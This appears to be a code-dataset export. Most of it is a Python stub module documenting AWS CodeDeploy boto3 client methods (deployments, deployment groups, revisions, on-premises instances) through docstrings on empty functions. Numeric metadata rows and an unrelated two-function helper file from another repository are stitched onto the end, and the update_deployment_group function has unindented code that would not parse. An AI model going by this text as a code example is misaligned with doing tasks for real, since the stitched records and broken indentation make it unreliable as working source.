        'TERMINATE'|'KEEP_ALIVE' plus terminationWaitTimeInMinutes),
        ``deploymentReadyOption`` (actionOnTimeout
        'CONTINUE_DEPLOYMENT'|'STOP_DEPLOYMENT' plus waitTimeInMinutes,
        which applies only to STOP_DEPLOYMENT), and
        ``greenFleetProvisioningOption`` (action
        'DISCOVER_EXISTING'|'COPY_AUTO_SCALING_GROUP').
    :type loadBalancerInfo: dict
    :param loadBalancerInfo: The load balancer used in the deployment:
        ``elbInfoList``, a list of dicts naming the Elastic Load Balancing
        load balancer that routes traffic (blue/green) or that instances are
        deregistered from during an in-place deployment.
    :rtype: dict
    :return: {'deploymentGroupId': 'string'}
    """
    # Stub only: the concrete client method is generated by botocore at runtime.
    pass
def delete_application(applicationName=None):
    """
    Deletes an application.

    See also: AWS API Documentation

    :example: response = client.delete_application(
        applicationName='string'
    )
    :type applicationName: string
    :param applicationName: [REQUIRED] The name of an AWS CodeDeploy
        application associated with the applicable IAM user or AWS account.
    """
    # Stub only: the concrete client method is generated by botocore at runtime.
    pass
def delete_deployment_config(deploymentConfigName=None):
    """
    Deletes a deployment configuration.

    See also: AWS API Documentation

    :example: response = client.delete_deployment_config(
        deploymentConfigName='string'
    )
    :type deploymentConfigName: string
    :param deploymentConfigName: [REQUIRED] The name of a deployment
        configuration associated with the applicable IAM user or AWS account.
    """
    # Stub only: the concrete client method is generated by botocore at runtime.
    pass
def delete_deployment_group(applicationName=None, deploymentGroupName=None):
    """
    Deletes a deployment group.

    See also: AWS API Documentation

    :example: response = client.delete_deployment_group(
        applicationName='string',
        deploymentGroupName='string'
    )
    :type applicationName: string
    :param applicationName: [REQUIRED] The name of an AWS CodeDeploy
        application associated with the applicable IAM user or AWS account.
    :type deploymentGroupName: string
    :param deploymentGroupName: [REQUIRED] The name of an existing deployment
        group for the specified application.
    :rtype: dict
    :return: A dict with ``hooksNotCleanedUp``, a list of dicts (``name``,
        ``hook``) describing Auto Scaling lifecycle hooks that could not be
        removed.
    """
    # Stub only: the concrete client method is generated by botocore at runtime.
    pass
def deregister_on_premises_instance(instanceName=None):
    """
    Deregisters an on-premises instance.

    See also: AWS API Documentation

    :example: response = client.deregister_on_premises_instance(
        instanceName='string'
    )
    :type instanceName: string
    :param instanceName: [REQUIRED] The name of the on-premises instance to
        deregister.
    """
    # Stub only: the concrete client method is generated by botocore at runtime.
    pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
    """
    Generate a presigned url given a client, its method, and arguments.

    :type ClientMethod: string
    :param ClientMethod: The client method to presign for.
    :type Params: dict
    :param Params: The parameters normally passed to ``ClientMethod``.
    :type ExpiresIn: int
    :param ExpiresIn: The number of seconds the presigned url is valid for.
        By default it expires in an hour (3600 seconds).
    :type HttpMethod: string
    :param HttpMethod: The http method to use on the generated url. By
        default, the http method is whatever is used in the method's model.
    """
    # Stub only: the concrete client method is generated by botocore at runtime.
    pass
def get_application(applicationName=None):
    """
    Gets information about an application.

    See also: AWS API Documentation

    :example: response = client.get_application(
        applicationName='string'
    )
    :type applicationName: string
    :param applicationName: [REQUIRED] The name of an AWS CodeDeploy
        application associated with the applicable IAM user or AWS account.
    :rtype: dict
    :return: A dict with an ``application`` entry containing
        ``applicationId``, ``applicationName``, ``createTime``,
        ``linkedToGitHub`` (boolean), and ``gitHubAccountName``.
    """
    # Stub only: the concrete client method is generated by botocore at runtime.
    pass
def get_application_revision(applicationName=None, revision=None):
    """
    Gets information about an application revision.

    See also: AWS API Documentation

    :type applicationName: string
    :param applicationName: [REQUIRED] The name of the application that
        corresponds to the revision.
    :type revision: dict
    :param revision: [REQUIRED] Information about the application revision to
        get, including type and location: ``revisionType`` of 'S3' or
        'GitHub', plus the matching ``s3Location`` (bucket, key, bundleType
        'tar'|'tgz'|'zip', optional version — most recent used when omitted —
        and optional eTag, whose validation is skipped when omitted) or
        ``gitHubLocation`` (repository as account/repository, and the SHA1
        commitId representing the bundled artifacts).
    :rtype: dict
    :return: A dict with ``applicationName``, the echoed ``revision``
        location, and ``revisionInfo`` containing ``description``,
        ``deploymentGroups`` (list of strings), ``firstUsedTime``,
        ``lastUsedTime``, and ``registerTime``.
    :returns:
        S3: An application revision stored in Amazon S3.
        GitHub: An application revision stored in GitHub.
    """
    # Stub only: the concrete client method is generated by botocore at runtime.
    pass
def get_deployment(deploymentId=None):
    """Get information about a single deployment.

    See also: AWS API Documentation.

    :example: response = client.get_deployment(deploymentId='string')

    :type deploymentId: string
    :param deploymentId: [REQUIRED] A deployment ID associated with the
        applicable IAM user or AWS account.

    :rtype: dict
    :return: A dict with a single ``deploymentInfo`` key describing the
        deployment: application / deployment-group / config names, the
        deployment ID, the previous and target revisions (each an S3 or
        GitHub location), status (``Created``/``Queued``/``InProgress``/
        ``Succeeded``/``Failed``/``Stopped``/``Ready``), error information
        (code and message), create/start/complete timestamps, a per-status
        instance-count ``deploymentOverview``, description, creator,
        ``ignoreApplicationStopFailures``, auto-rollback configuration,
        ``updateOutdatedInstancesOnly``, rollback info, deployment style
        (in-place or blue/green, with/without traffic control), target
        instances (tag filters and Auto Scaling groups), blue/green
        configuration (blue-instance termination, deployment-ready and
        green-fleet provisioning options), load balancer info, additional
        status info, and ``fileExistsBehavior``
        (``DISALLOW``/``OVERWRITE``/``RETAIN``).

        Revision ``bundleType`` values:
        tar: A tar archive file.
        tgz: A compressed tar archive file.
        zip: A zip archive file.
    """
    pass
def get_deployment_config(deploymentConfigName=None):
    """Get information about a deployment configuration.

    See also: AWS API Documentation.

    :example: response = client.get_deployment_config(
        deploymentConfigName='string')

    :type deploymentConfigName: string
    :param deploymentConfigName: [REQUIRED] The name of a deployment
        configuration associated with the applicable IAM user or AWS
        account.

    :rtype: dict
    :return: A dict with a ``deploymentConfigInfo`` key containing the
        configuration's ID and name, its ``minimumHealthyHosts`` setting
        (``value`` plus ``type`` of ``HOST_COUNT`` or ``FLEET_PERCENT``),
        and its ``createTime``.
    """
    pass
def get_deployment_group(applicationName=None, deploymentGroupName=None):
    """Get information about a deployment group.

    See also: AWS API Documentation.

    :example: response = client.get_deployment_group(
        applicationName='string',
        deploymentGroupName='string')

    :type applicationName: string
    :param applicationName: [REQUIRED] The name of an AWS CodeDeploy
        application associated with the applicable IAM user or AWS account.

    :type deploymentGroupName: string
    :param deploymentGroupName: [REQUIRED] The name of an existing
        deployment group for the specified application.

    :rtype: dict
    :return: A dict with a ``deploymentGroupInfo`` key describing the
        group: application name, group ID and name, deployment config
        name, EC2 and on-premises instance tag filters (each with ``Key``,
        ``Value``, and a ``Type`` of ``KEY_ONLY``/``VALUE_ONLY``/
        ``KEY_AND_VALUE``), Auto Scaling groups (name and hook), service
        role ARN, the target revision (S3 or GitHub location), trigger
        configurations (name, target ARN, and deployment/instance
        lifecycle events), alarm and auto-rollback configuration,
        deployment style, blue/green configuration, load balancer info,
        and summaries of the last successful and last attempted
        deployments (ID, status, end/create times).

        Tag filter ``Type`` values:
        KEY_ONLY: Key only.
        VALUE_ONLY: Value only.
        KEY_AND_VALUE: Key and value.
    """
    pass
def get_deployment_instance(deploymentId=None, instanceId=None):
    """Get information about an instance that is part of a deployment.

    See also: AWS API Documentation.

    :example: response = client.get_deployment_instance(
        deploymentId='string',
        instanceId='string')

    :type deploymentId: string
    :param deploymentId: [REQUIRED] The unique ID of a deployment.

    :type instanceId: string
    :param instanceId: [REQUIRED] The unique ID of an instance in the
        deployment group.

    :rtype: dict
    :return: A dict with an ``instanceSummary`` key: the deployment and
        instance IDs, the instance's deployment status, ``lastUpdatedAt``,
        a list of lifecycle events (each with a name, diagnostics — error
        code, script name, message, log tail — start/end times, and a
        status), and the instance type (``Blue`` or ``Green``).

        Instance deployment status values:
        Pending: The deployment is pending for this instance.
        In Progress: The deployment is in progress for this instance.
        Succeeded: The deployment has succeeded for this instance.
        Failed: The deployment has failed for this instance.
        Skipped: The deployment has been skipped for this instance.
        Unknown: The deployment status is unknown for this instance.
    """
    pass
def get_on_premises_instance(instanceName=None):
    """Get information about an on-premises instance.

    See also: AWS API Documentation.

    :example: response = client.get_on_premises_instance(
        instanceName='string')

    :type instanceName: string
    :param instanceName: [REQUIRED] The name of the on-premises instance
        about which to get information.

    :rtype: dict
    :return: A dict with an ``instanceInfo`` key containing the instance
        name, IAM session and user ARNs, the instance ARN, register and
        deregister times, and a list of ``Key``/``Value`` tags.
    """
    pass
def get_paginator(operation_name=None):
    """Create a paginator for an operation.

    :type operation_name: string
    :param operation_name: The operation name, identical to the method
        name on the client. For example, if the method name is
        ``create_foo`` (normally invoked as ``client.create_foo(**kwargs)``)
        and the operation can be paginated, call
        ``client.get_paginator('create_foo')``.

    :rtype: L{botocore.paginate.Paginator}
    """
    pass
def get_waiter():
    """Return a waiter object for this client.

    Documentation defect fix: the generated stub had an empty docstring.
    NOTE(review): this generated stub takes no arguments and has no body;
    presumably no waiters are defined for this client in this module —
    confirm against the service's waiter model.
    """
    pass
def list_application_revisions(applicationName=None, sortBy=None, sortOrder=None, s3Bucket=None, s3KeyPrefix=None, deployed=None, nextToken=None):
    """List information about revisions for an application.

    See also: AWS API Documentation.

    :example: response = client.list_application_revisions(
        applicationName='string',
        sortBy='registerTime'|'firstUsedTime'|'lastUsedTime',
        sortOrder='ascending'|'descending',
        s3Bucket='string',
        s3KeyPrefix='string',
        deployed='include'|'exclude'|'ignore',
        nextToken='string')

    :type applicationName: string
    :param applicationName: [REQUIRED] The name of an AWS CodeDeploy
        application associated with the applicable IAM user or AWS account.

    :type sortBy: string
    :param sortBy: The column name used to sort the results:
        registerTime: Sort by the time the revisions were registered with
        AWS CodeDeploy.
        firstUsedTime: Sort by the time the revisions were first used in a
        deployment.
        lastUsedTime: Sort by the time the revisions were last used in a
        deployment.
        If not specified or set to null, the results are returned in an
        arbitrary order.

    :type sortOrder: string
    :param sortOrder: The order in which to sort the results (``ascending``
        or ``descending``). Defaults to ascending; null yields an
        arbitrary order.

    :type s3Bucket: string
    :param s3Bucket: An Amazon S3 bucket name to limit the search for
        revisions. If set to null, all of the user's buckets are searched.

    :type s3KeyPrefix: string
    :param s3KeyPrefix: A key prefix for the set of Amazon S3 objects to
        limit the search for revisions.

    :type deployed: string
    :param deployed: Whether to list revisions based on whether the
        revision is the target revision of a deployment group:
        include: List revisions that are target revisions of a deployment
        group.
        exclude: Do not list revisions that are target revisions of a
        deployment group.
        ignore: List all revisions.

    :type nextToken: string
    :param nextToken: An identifier returned from the previous list
        application revisions call, used to return the next set of
        applications in the list.

    :rtype: dict
    :return: A dict with ``revisions`` (a list of revision locations, each
        with a ``revisionType`` of ``S3`` or ``GitHub`` plus the matching
        ``s3Location`` or ``gitHubLocation``) and a ``nextToken``.

        Revision types:
        S3: An application revision stored in Amazon S3.
        GitHub: An application revision stored in GitHub.
    """
    pass
def list_applications(nextToken=None):
    """List the applications registered with the applicable IAM user or
    AWS account.

    See also: AWS API Documentation.

    :example: response = client.list_applications(nextToken='string')

    :type nextToken: string
    :param nextToken: An identifier returned from the previous list
        applications call, used to return the next set of applications in
        the list.

    :rtype: dict
    :return: A dict with ``applications`` (a list of application-name
        strings) and a ``nextToken``.
    """
    pass
def list_deployment_configs(nextToken=None):
    """List the deployment configurations with the applicable IAM user or
    AWS account.

    See also: AWS API Documentation.

    :example: response = client.list_deployment_configs(nextToken='string')

    :type nextToken: string
    :param nextToken: An identifier returned from the previous list
        deployment configurations call, used to return the next set of
        deployment configurations in the list.

    :rtype: dict
    :return: A dict with ``deploymentConfigsList`` (a list of
        configuration-name strings) and a ``nextToken``.
    """
    pass
def list_deployment_groups(applicationName=None, nextToken=None):
    """List the deployment groups for an application registered with the
    applicable IAM user or AWS account.

    See also: AWS API Documentation.

    :example: response = client.list_deployment_groups(
        applicationName='string',
        nextToken='string')

    :type applicationName: string
    :param applicationName: [REQUIRED] The name of an AWS CodeDeploy
        application associated with the applicable IAM user or AWS account.

    :type nextToken: string
    :param nextToken: An identifier returned from the previous list
        deployment groups call, used to return the next set of deployment
        groups in the list.

    :rtype: dict
    :return: A dict with the ``applicationName``, a ``deploymentGroups``
        list of group-name strings, and a ``nextToken``.
    """
    pass
def list_deployment_instances(deploymentId=None, nextToken=None, instanceStatusFilter=None, instanceTypeFilter=None):
    """List the instances for a deployment associated with the applicable
    IAM user or AWS account.

    See also: AWS API Documentation.

    :example: response = client.list_deployment_instances(
        deploymentId='string',
        nextToken='string',
        instanceStatusFilter=[
            'Pending'|'InProgress'|'Succeeded'|'Failed'|'Skipped'|'Unknown'|'Ready',
        ],
        instanceTypeFilter=[
            'Blue'|'Green',
        ])

    :type deploymentId: string
    :param deploymentId: [REQUIRED] The unique ID of a deployment.

    :type nextToken: string
    :param nextToken: An identifier returned from the previous list
        deployment instances call, used to return the next set of
        deployment instances in the list.

    :type instanceStatusFilter: list
    :param instanceStatusFilter: A subset of instances to list by status:
        Pending: Include instances with pending deployments.
        InProgress: Include instances where deployments are still in
        progress.
        Succeeded: Include instances with successful deployments.
        Failed: Include instances with failed deployments.
        Skipped: Include instances with skipped deployments.
        Unknown: Include instances with deployments in an unknown state.
        (string) --

    :type instanceTypeFilter: list
    :param instanceTypeFilter: The set of instances in a blue/green
        deployment for which to view instance information: those in the
        original environment ('BLUE') or those in the replacement
        environment ('GREEN').
        (string) --

    :rtype: dict
    :return: A dict with ``instancesList`` (a list of instance-ID strings)
        and a ``nextToken``.
    """
    pass
def list_deployments(applicationName=None, deploymentGroupName=None, includeOnlyStatuses=None, createTimeRange=None, nextToken=None):
    """List the deployments in a deployment group for an application
    registered with the applicable IAM user or AWS account.

    See also: AWS API Documentation.

    :example: response = client.list_deployments(
        applicationName='string',
        deploymentGroupName='string',
        includeOnlyStatuses=[
            'Created'|'Queued'|'InProgress'|'Succeeded'|'Failed'|'Stopped'|'Ready',
        ],
        createTimeRange={
            'start': datetime(2015, 1, 1),
            'end': datetime(2015, 1, 1)
        },
        nextToken='string')

    :type applicationName: string
    :param applicationName: The name of an AWS CodeDeploy application
        associated with the applicable IAM user or AWS account.

    :type deploymentGroupName: string
    :param deploymentGroupName: The name of an existing deployment group
        for the specified application.

    :type includeOnlyStatuses: list
    :param includeOnlyStatuses: A subset of deployments to list by status:
        Created: Include created deployments in the resulting list.
        Queued: Include queued deployments in the resulting list.
        In Progress: Include in-progress deployments in the resulting list.
        Succeeded: Include successful deployments in the resulting list.
        Failed: Include failed deployments in the resulting list.
        Stopped: Include stopped deployments in the resulting list.
        (string) --

    :type createTimeRange: dict
    :param createTimeRange: A time range (start and end) for returning a
        subset of the list of deployments.
        start (datetime) --The start time of the time range. Specify null
        to leave the start time open-ended.
        end (datetime) --The end time of the time range. Specify null to
        leave the end time open-ended.

    :type nextToken: string
    :param nextToken: An identifier returned from the previous list
        deployments call, used to return the next set of deployments in
        the list.

    :rtype: dict
    :return: A dict with ``deployments`` (a list of deployment-ID strings)
        and a ``nextToken``.
    """
    pass
def list_git_hub_account_token_names(nextToken=None):
    """List the names of stored connections to GitHub accounts.

    See also: AWS API Documentation.

    :example: response = client.list_git_hub_account_token_names(
        nextToken='string')

    :type nextToken: string
    :param nextToken: An identifier returned from the previous
        ListGitHubAccountTokenNames call, used to return the next set of
        names in the list.

    :rtype: dict
    :return: A dict with ``tokenNameList`` (a list of token-name strings)
        and a ``nextToken``.
    """
    pass
def list_on_premises_instances(registrationStatus=None, tagFilters=None, nextToken=None):
    """Get a list of names for one or more on-premises instances.

    Unless otherwise specified, both registered and deregistered
    on-premises instance names are listed. To list only registered or only
    deregistered names, use the registration status parameter.

    See also: AWS API Documentation.

    :example: response = client.list_on_premises_instances(
        registrationStatus='Registered'|'Deregistered',
        tagFilters=[
            {
                'Key': 'string',
                'Value': 'string',
                'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
            },
        ],
        nextToken='string')

    :type registrationStatus: string
    :param registrationStatus: The registration status of the on-premises
        instances:
        Deregistered: Include deregistered on-premises instances in the
        resulting list.
        Registered: Include registered on-premises instances in the
        resulting list.

    :type tagFilters: list
    :param tagFilters: The on-premises instance tags used to restrict the
        on-premises instance names returned.
        (dict) --Information about an on-premises instance tag filter.
        Key (string) --The on-premises instance tag filter key.
        Value (string) --The on-premises instance tag filter value.
        Type (string) --The on-premises instance tag filter type:
        KEY_ONLY: Key only.
        VALUE_ONLY: Value only.
        KEY_AND_VALUE: Key and value.

    :type nextToken: string
    :param nextToken: An identifier returned from the previous list
        on-premises instances call, used to return the next set of
        on-premises instances in the list.

    :rtype: dict
    :return: A dict with ``instanceNames`` (a list of name strings) and a
        ``nextToken``.
    """
    pass
def register_application_revision(applicationName=None, description=None, revision=None):
    """Register a revision for the specified application with AWS
    CodeDeploy.

    See also: AWS API Documentation.

    :example: response = client.register_application_revision(
        applicationName='string',
        description='string',
        revision={
            'revisionType': 'S3'|'GitHub',
            's3Location': {
                'bucket': 'string',
                'key': 'string',
                'bundleType': 'tar'|'tgz'|'zip',
                'version': 'string',
                'eTag': 'string'
            },
            'gitHubLocation': {
                'repository': 'string',
                'commitId': 'string'
            }
        })

    :type applicationName: string
    :param applicationName: [REQUIRED] The name of an AWS CodeDeploy
        application associated with the applicable IAM user or AWS account.

    :type description: string
    :param description: A comment about the revision.

    :type revision: dict
    :param revision: [REQUIRED] Information about the application revision
        to register, including type and location.
        revisionType (string) --The type of application revision:
        S3: An application revision stored in Amazon S3.
        GitHub: An application revision stored in GitHub.
        s3Location (dict) --The location of application artifacts stored
        in Amazon S3:
        bucket (string) --The name of the Amazon S3 bucket where the
        application revision is stored.
        key (string) --The name of the Amazon S3 object that represents
        the bundled artifacts for the application revision.
        bundleType (string) --The file type of the application revision;
        one of ``tar`` (a tar archive file), ``tgz`` (a compressed tar
        archive file), or ``zip`` (a zip archive file).
        version (string) --A specific version of the Amazon S3 object; if
        not specified, the most recent version is used by default.
        eTag (string) --The ETag of the Amazon S3 object; if not specified
        as an input parameter, ETag validation of the object is skipped.
        gitHubLocation (dict) --The location of application artifacts
        stored in GitHub:
        repository (string) --The GitHub account and repository pair
        (specified as account/repository) that stores a reference to the
        commit representing the bundled artifacts.
        commitId (string) --The SHA1 commit ID of the GitHub commit that
        represents the bundled artifacts for the application revision.
    """
    pass
def register_on_premises_instance(instanceName=None, iamSessionArn=None, iamUserArn=None):
    """Register an on-premises instance.

    See also: AWS API Documentation.

    :example: response = client.register_on_premises_instance(
        instanceName='string',
        iamSessionArn='string',
        iamUserArn='string')

    :type instanceName: string
    :param instanceName: [REQUIRED] The name of the on-premises instance
        to register.

    :type iamSessionArn: string
    :param iamSessionArn: The ARN of the IAM session to associate with the
        on-premises instance.

    :type iamUserArn: string
    :param iamUserArn: The ARN of the IAM user to associate with the
        on-premises instance.
    """
    pass
def remove_tags_from_on_premises_instances(tags=None, instanceNames=None):
    """Remove one or more tags from one or more on-premises instances.

    See also: AWS API Documentation.

    :example: response = client.remove_tags_from_on_premises_instances(
        tags=[
            {
                'Key': 'string',
                'Value': 'string'
            },
        ],
        instanceNames=[
            'string',
        ])

    :type tags: list
    :param tags: [REQUIRED] The tag key-value pairs to remove from the
        on-premises instances.
        (dict) --Information about a tag.
        Key (string) --The tag's key.
        Value (string) --The tag's value.

    :type instanceNames: list
    :param instanceNames: [REQUIRED] The names of the on-premises
        instances from which to remove tags.
        (string) --
    """
    pass
def skip_wait_time_for_instance_termination(deploymentId=None):
    """In a blue/green deployment, override any specified wait time and
    start terminating instances immediately after traffic routing is
    completed.

    See also: AWS API Documentation.

    :example: response = client.skip_wait_time_for_instance_termination(
        deploymentId='string')

    :type deploymentId: string
    :param deploymentId: The ID of the blue/green deployment for which to
        skip the instance termination wait time.
    """
    pass
def stop_deployment(deploymentId=None, autoRollbackEnabled=None):
    """Attempt to stop an ongoing deployment.

    See also: AWS API Documentation.

    :example: response = client.stop_deployment(
        deploymentId='string',
        autoRollbackEnabled=True|False)

    :type deploymentId: string
    :param deploymentId: [REQUIRED] The unique ID of a deployment.

    :type autoRollbackEnabled: boolean
    :param autoRollbackEnabled: Indicates, when a deployment is stopped,
        whether instances that have been updated should be rolled back to
        the previous version of the application revision.

    :rtype: dict
    :return: A dict with a ``status`` and a ``statusMessage``:
        Pending: The stop operation is pending.
        Succeeded: The stop operation was successful.
    """
    pass
def update_application(applicationName=None, newApplicationName=None):
    """Change the name of an application.

    See also: AWS API Documentation.

    :example: response = client.update_application(
        applicationName='string',
        newApplicationName='string')

    :type applicationName: string
    :param applicationName: The current name of the application you want
        to change.

    :type newApplicationName: string
    :param newApplicationName: The new name to give the application.
    """
    pass
def update_deployment_group(applicationName=None, currentDeploymentGroupName=None, newDeploymentGroupName=None, deploymentConfigName=None, ec2TagFilters=None, onPremisesInstanceTagFilters=None, autoScalingGroups=None, serviceRoleArn=None, triggerConfigurations=None, alarmConfiguration=None, autoRollbackConfiguration=None, deploymentStyle=None, blueGreenDeploymentConfiguration=None, loadBalancerInfo=None):
"""
Changes information about a deployment group.
See also: AWS API Documentation
:example: response = client.update_deployment_group(
applicationName='string',
currentDeploymentGroupName='string',
newDeploymentGroupName='string',
deploymentConfigName='string',
ec2TagFilters=[
{
'Key': 'string',
'Value': 'string',
'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
},
],
onPremisesInstanceTagFilters=[
{
'Key': 'string',
'Value': 'string',
'Type': 'KEY_ONLY'|'VALUE_ONLY'|'KEY_AND_VALUE'
},
],
autoScalingGroups=[
'string',
],
serviceRoleArn='string',
triggerConfigurations=[
{
'triggerName': 'string',
'triggerTargetArn': 'string',
'triggerEvents': [
'DeploymentStart'|'DeploymentSuccess'|'DeploymentFailure'|'DeploymentStop'|'DeploymentRollback'|'DeploymentReady'|'InstanceStart'|'InstanceSuccess'|'InstanceFailure'|'InstanceReady',
]
},
],
alarmConfiguration={
'enabled': True|False,
'ignorePollAlarmFailure': True|False,
'alarms': [
{
'name': 'string'
},
]
},
autoRollbackConfiguration={
'enabled': True|False,
'events': [
'DEPLOYMENT_FAILURE'|'DEPLOYMENT_STOP_ON_ALARM'|'DEPLOYMENT_STOP_ON_REQUEST',
]
},
deploymentStyle={
'deploymentType': 'IN_PLACE'|'BLUE_GREEN',
'deploymentOption': 'WITH_TRAFFIC_CONTROL'|'WITHOUT_TRAFFIC_CONTROL'
},
blueGreenDeploymentConfiguration={
'terminateBlueInstancesOnDeploymentSuccess': {
'action': 'TERMINATE'|'KEEP_ALIVE',
'terminationWaitTimeInMinutes': 123
},
'deploymentReadyOption': {
'actionOnTimeout': 'CONTINUE_DEPLOYMENT'|'STOP_DEPLOYMENT',
'waitTimeInMinutes': 123
},
'greenFleetProvisioningOption': {
'action': 'DISCOVER_EXISTING'|'COPY_AUTO_SCALING_GROUP'
}
},
loadBalancerInfo={
'elbInfoList': [
{
'name': 'string'
},
]
}
)
:type applicationName: string
:param applicationName: [REQUIRED]
The application name corresponding to the deployment group to update.
:type currentDeploymentGroupName: string
:param currentDeploymentGroupName: [REQUIRED]
The current name of the deployment group.
:type newDeploymentGroupName: string
:param newDeploymentGroupName: The new name of the deployment group, if you want to change it.
:type deploymentConfigName: string
:param deploymentConfigName: The replacement deployment configuration name to use, if you want to change it.
:type ec2TagFilters: list
:param ec2TagFilters: The replacement set of Amazon EC2 tags on which to filter, if you want to change them. To keep the existing tags, enter their names. To remove tags, do not enter any tag names.
(dict) --Information about an EC2 tag filter.
Key (string) --The tag filter key.
Value (string) --The tag filter value.
Type (string) --The tag filter type:
KEY_ONLY: Key only.
VALUE_ONLY: Value only.
KEY_AND_VALUE: Key and value.
:type onPremisesInstanceTagFilters: list
:param onPremisesInstanceTagFilters: The replacement set of on-premises instance tags on which to filter, if you want to change them. To keep the existing tags, enter their names. To remove tags, do not enter any tag names.
(dict) --Information about an on-premises instance tag filter.
Key (string) --The on-premises instance tag filter key.
Value (string) --The on-premises instance tag filter value.
Type (string) --The on-premises instance tag filter type:
KEY_ONLY: Key only.
VALUE_ONLY: Value only.
KEY_AND_VALUE: Key and value.
:type autoScalingGroups: list
:param autoScalingGroups: The replacement list of Auto Scaling groups to be included in the deployment group, if you want to change them. To keep the Auto Scaling groups, enter their names. To remove Auto Scaling groups, do not enter any Auto Scaling group names.
(string) --
:type serviceRoleArn: string
:param serviceRoleArn: A replacement ARN for the service role, if you want to change it.
:type triggerConfigurations: list
:param triggerConfigurations: Information about triggers to change when the deployment group is updated. For examples, see Modify Triggers in an AWS CodeDeploy Deployment Group in the AWS CodeDeploy User Guide.
(dict) --Information about notification triggers for the deployment group.
triggerName (string) --The name of the notification trigger.
triggerTargetArn (string) --The ARN of the Amazon Simple Notification Service topic through which notifications about deployment or instance events are sent.
triggerEvents (list) --The event type or types for which notifications are triggered.
(string) --
:type alarmConfiguration: dict
:param alarmConfiguration: Information to add or change about Amazon CloudWatch alarms when the deployment group is updated.
enabled (boolean) --Indicates whether the alarm configuration is enabled.
ignorePollAlarmFailure (boolean) --Indicates whether a deployment should continue if information about the current state of alarms cannot be retrieved from Amazon CloudWatch. The default value is false.
true: The deployment will proceed even if alarm status information can't be retrieved from Amazon CloudWatch.
false: The deployment will stop if alarm status information can't be retrieved from Amazon CloudWatch.
alarms (list) --A list of alarms configured for the deployment group. A maximum of 10 alarms can be added to a deployment group.
(dict) --Information about an alarm.
name (string) --The name of the alarm. Maximum length is 255 characters. Each alarm name can be used only once in a list of alarms.
:type autoRollbackConfiguration: dict
:param autoRollbackConfiguration: Information for an automatic rollback configuration that is added or changed when a deployment group is updated.
enabled (boolean) --Indicates whether a defined automatic rollback configuration is currently enabled.
events (list) --The event type or types that trigger a rollback.
(string) --
:type deploymentStyle: dict
:param deploymentStyle: Information about the type of deployment, either in-place or blue/green, you want to run and whether to route deployment traffic behind a load balancer.
deploymentType (string) --Indicates whether to run an in-place deployment or a blue/green deployment.
deploymentOption (string) --Indicates whether to route deployment traffic behind a load balancer.
:type blueGreenDeploymentConfiguration: dict
:param blueGreenDeploymentConfiguration: Information about blue/green deployment options for a deployment group.
terminateBlueInstancesOnDeploymentSuccess (dict) --Information about whether to terminate instances in the original fleet during a blue/green deployment.
action (string) --The action to take on instances in the original environment after a successful blue/green deployment.
TERMINATE: Instances are terminated after a specified wait time.
KEEP_ALIVE: Instances are left running after they are deregistered from the load balancer and removed from the deployment group.
terminationWaitTimeInMinutes (integer) --The number of minutes to wait after a successful blue/green deployment before terminating instances from the original environment.
deploymentReadyOption (dict) --Information about the action to take when newly provisioned instances are ready to receive traffic in a blue/green deployment.
actionOnTimeout (string) --Information about when to reroute traffic from an original environment to a replacement environment in a blue/green deployment.
CONTINUE_DEPLOYMENT: Register new instances with the load balancer immediately after the new application revision is installed on the instances in the replacement environment.
STOP_DEPLOYMENT: Do not register new instances with load balancer unless traffic is rerouted manually. If traffic is not rerouted manually before the end of the specified wait period, the deployment status is changed to Stopped.
waitTimeInMinutes (integer) --The number of minutes to wait before the status of a blue/green deployment changed to Stopped if rerouting is not started manually. Applies only to the STOP_DEPLOYMENT option for actionOnTimeout
greenFleetProvisioningOption (dict) --Information about how instances are provisioned for a replacement environment in a blue/green deployment.
action (string) --The method used to add instances to a replacement environment.
DISCOVER_EXISTING: Use instances that already exist or will be created manually.
COPY_AUTO_SCALING_GROUP: Use settings from a specified Auto Scaling group to define and create instances in a new Auto Scaling group.
:type loadBalancerInfo: dict
:param loadBalancerInfo: Information about the load balancer used in a deployment.
elbInfoList (list) --An array containing information about the load balancer in Elastic Load Balancing to use in a deployment.
(dict) --Information about a load balancer in Elastic Load Balancing to use in a deployment.
name (string) --For blue/green deployments, the name of the load balancer that will be used to route traffic from original instances to replacement instances in a blue/green deployment. For in-place deployments, the name of the load balancer that instances are deregistered from so they are not serving traffic during a deployment, and then re-registered with after the deployment completes.
:rtype: dict
:return: {
'hooksNotCleanedUp': [
{
'name': 'string',
'hook': 'string'
},
]
}
"""
pass
| 39.556189
| 669
| 0.593392
| 9,304
| 97,150
| 6.143809
| 0.076419
| 0.007173
| 0.00677
| 0.008642
| 0.779486
| 0.744288
| 0.719586
| 0.69373
| 0.679665
| 0.663973
| 0
| 0.00632
| 0.328976
| 97,150
| 2,455
| 670
| 39.572301
| 0.870532
| 0.863695
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
c316843677383f785526b2dfcc8be68396c6ac4d
| 142
|
py
|
Python
|
api/app/utils/misc.py
|
martinoywa/Baobab
|
f87bfefa69398fb8a59fc7684323c89f2813c1a0
|
[
"Apache-2.0"
] | 1
|
2020-03-08T20:00:24.000Z
|
2020-03-08T20:00:24.000Z
|
api/app/utils/misc.py
|
martinoywa/Baobab
|
f87bfefa69398fb8a59fc7684323c89f2813c1a0
|
[
"Apache-2.0"
] | null | null | null |
api/app/utils/misc.py
|
martinoywa/Baobab
|
f87bfefa69398fb8a59fc7684323c89f2813c1a0
|
[
"Apache-2.0"
] | null | null | null |
import uuid
from flask import g
def get_baobab_host():
return g.organisation.system_url
def make_code():
return str(uuid.uuid4())
| 12.909091
| 36
| 0.725352
| 22
| 142
| 4.5
| 0.772727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008621
| 0.183099
| 142
| 10
| 37
| 14.2
| 0.844828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
